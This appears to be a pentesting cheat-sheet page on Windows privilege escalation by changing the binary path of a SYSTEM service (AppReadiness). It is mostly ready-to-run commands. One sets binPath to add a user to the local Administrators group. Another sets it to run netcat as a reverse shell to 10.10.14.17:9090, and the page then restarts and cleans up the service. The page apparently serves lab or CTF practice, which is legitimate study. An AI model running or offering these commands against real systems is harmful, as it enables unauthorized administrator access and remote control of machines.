Exploit#

Choose a service that run as SYSTEM, like AppReadiness. We can query service info like this.

sc qc AppReadiness

Remember to note down the BINARY_PATH_NAME, we will modify it, so when cleaning up we need to reverse the process

Check permission#

Download PsService and transfer to target machine. This binary is from sysinternal suite

wget https://download.sysinternals.com/files/PSTools.zip
unzip PSTools.zip

Then we can check our permission over this service. All is good

.\PsService.exe security AppReadiness

Modify service#

Here we add user server_adm to local admin group

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Or we can execute a reverse shell, whatever you wanna execute

sc.exe config AppReadiness binPath="C:\programdata\nc.exe -e cmd.exe 10.10.14.17 9090"

Start service

sc.exe stop AppReadiness
sc.exe start AppReadiness

Clean up#

sc config AppReadiness binPath= "<original BINARY_PATH_NAME>"
sc.exe stop AppReadiness
sc.exe start AppReadiness
Backward Se Restore Privilege Se Take Ownership Privilege Forward